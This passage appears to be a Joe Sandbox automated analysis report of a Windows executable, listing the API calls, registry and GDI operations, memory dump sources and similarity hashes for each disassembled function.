                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99016
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F99024
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99033
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F9903C
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99043
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99054
                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FA0C04,?), ref: 00F9906D
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F9907D
                                                                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9909D
                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00F990CD
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F990F5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F9910B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 06c892d29605c372e2a4090211e1bbb9397adf4046ea04b18d39f7b5193d3ea7
                                                                                                                                                                                                                                                                                        • Instruction ID: 297d4f384918924fa65cd0d6dcc21ce888451086ba88358350553255690f73f8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06c892d29605c372e2a4090211e1bbb9397adf4046ea04b18d39f7b5193d3ea7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC413A75600208BFEB219F69DC88EAE7BB8FF89721F204059F915D7260D7719D41EB20
                                                                                                                                                                                                                                                                                        Function 00F8C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C154
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C1D2
                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00F8C26A
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C2DE
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C2FC
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F8C352
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8C364
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8C382
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F8C3E3
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C3F4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                        • Opcode ID: 8c31051bbd6ab9e3d5fd2763d24c9b017ab96721962e68544ac1ee3ea15a4428
                                                                                                                                                                                                                                                                                        • Instruction ID: cce9f6b91e9d582dc37c9dd7e6abff98e35896aaf8775fc01445e3fcd1b662df
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c31051bbd6ab9e3d5fd2763d24c9b017ab96721962e68544ac1ee3ea15a4428
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17C19F35604201AFD720EF54C885F6ABBE1BF84318F54849CF4568B6A2CB75EC46EBE1
                                                                                                                                                                                                                                                                                        Function 00F82FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F83035
                                                                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F83045
                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00F83051
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00F8305E
                                                                                                                                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F830CA
                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F83109
                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F8312D
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00F83135
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00F8313E
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00F83145
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00F83150
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                        • Opcode ID: e74a467adf6e1be6d8bd38ee5a397563ea5ae1dffe72b887b191938ee7546881
                                                                                                                                                                                                                                                                                        • Instruction ID: 4fa9c5d8ed64e50817910e985083bb71276bfd398d423a81600b4efd3b1d1214
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e74a467adf6e1be6d8bd38ee5a397563ea5ae1dffe72b887b191938ee7546881
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1161F2B6D00219AFCF04DFA8DC85EAEBBB5FF48710F20841AE555A7210D775AA41DF90
                                                                                                                                                                                                                                                                                        Function 00F9A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F9A990
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00F9A9A7
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F9A9B3
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F9A9C9
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00F9AC15
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F9AC33
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F9AC54
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00F9AC73
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F9AC95
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 00F9ACBB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 3b8441142f5105456ba74b05205de2134756a541f2f0d24eb2d72727c27b4e5f
                                                                                                                                                                                                                                                                                        • Instruction ID: d4433bfeb4b5045e14a2fc16497ec1052d67080fa758b7deab00808cb077dc26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b8441142f5105456ba74b05205de2134756a541f2f0d24eb2d72727c27b4e5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AB18C31900219DFEF14CF69C9847AE7BF2BF84710F188069EC489F295D770A980EB91
                                                                                                                                                                                                                                                                                        Function 00F652AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00F652E6
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00F65328
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F65339
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00F65345
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6537A
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F653B2
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00F653EB
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F65445
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00F65477
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F654EF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                        • Opcode ID: c7dcf7d2f97426d102d8c398e42fc9185b9c682d3c6412076a19316e500a0fd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 4685eb2a9be81f75402dc5df3c0746e0f1c7932d19218917a2907355f20ea3b4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7dcf7d2f97426d102d8c398e42fc9185b9c682d3c6412076a19316e500a0fd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA914671504B06AFD708CF24CC95BAAB7A9FF00B14F144619FA8AA3181EB31ED45EB81
                                                                                                                                                                                                                                                                                        Function 00F9976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F997B6
                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 00F997C6
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00F997D1
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00F99879
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F9992B
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00F99948
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F99958
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F9998A
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F999CC
                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F999FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: e7d3a22d27bab2d9f85cd2a732e81ba18648388bd5434457a958ea55f1aad2f4
                                                                                                                                                                                                                                                                                        • Instruction ID: 1b1083c138cb40eb375ef6e6761bebb13a5a090571944bf90d969c8fecd1405a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7d3a22d27bab2d9f85cd2a732e81ba18648388bd5434457a958ea55f1aad2f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4981F7719083019FEB10CF29CC84A6B7BE8FF89364F15091EF94597291DBB0D905EBA2
                                                                                                                                                                                                                                                                                        Function 00F6C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00FD29C0,000000FF,00000000,00000030), ref: 00F6C973
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(00FD29C0,00000004,00000000,00000030), ref: 00F6C9A8
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00F6C9BA
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00F6CA00
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F6CA1D
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00F6CA49
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F6CA90
                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F6CAD6
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6CAEB
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6CB0C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 399b20e6542d59a720035d70b2e57dbbbe11f9a2e8f554d5449b1c4ab35f348c
                                                                                                                                                                                                                                                                                        • Instruction ID: 9d96405706c3d3d6c260dc8578301aff4fcaf1b687bc7e1a995d2c72a9f7bdcc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 399b20e6542d59a720035d70b2e57dbbbe11f9a2e8f554d5449b1c4ab35f348c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB61A07190024AAFDF11CFA4CD99AFE7BB9FB05358F140015E9D1A3291D738AD04EBA0
                                                                                                                                                                                                                                                                                        Function 00F6E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F6E4D4
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F6E4FA
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6E504
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6E554
                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F6E570
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                        • Opcode ID: 845db6911637db739a1a7c84bbce6f93cabeef7ff5e54c1493aa0a128e11aa23
                                                                                                                                                                                                                                                                                        • Instruction ID: 42edb6e9ddf41e197817fe8300776a53bbbc4fdf9c60613643ac13a9ae468ef1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 845db6911637db739a1a7c84bbce6f93cabeef7ff5e54c1493aa0a128e11aa23
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3241E5739442247BEB00AB64ED47FBF776CDF55720F24001AF901A60C2EB79DA01B6A6
                                                                                                                                                                                                                                                                                        Function 00F8D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8D6C4
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F8D6ED
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8D7A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F8D70A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F8D71D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8D72F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8D765
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8D788
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8D753
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
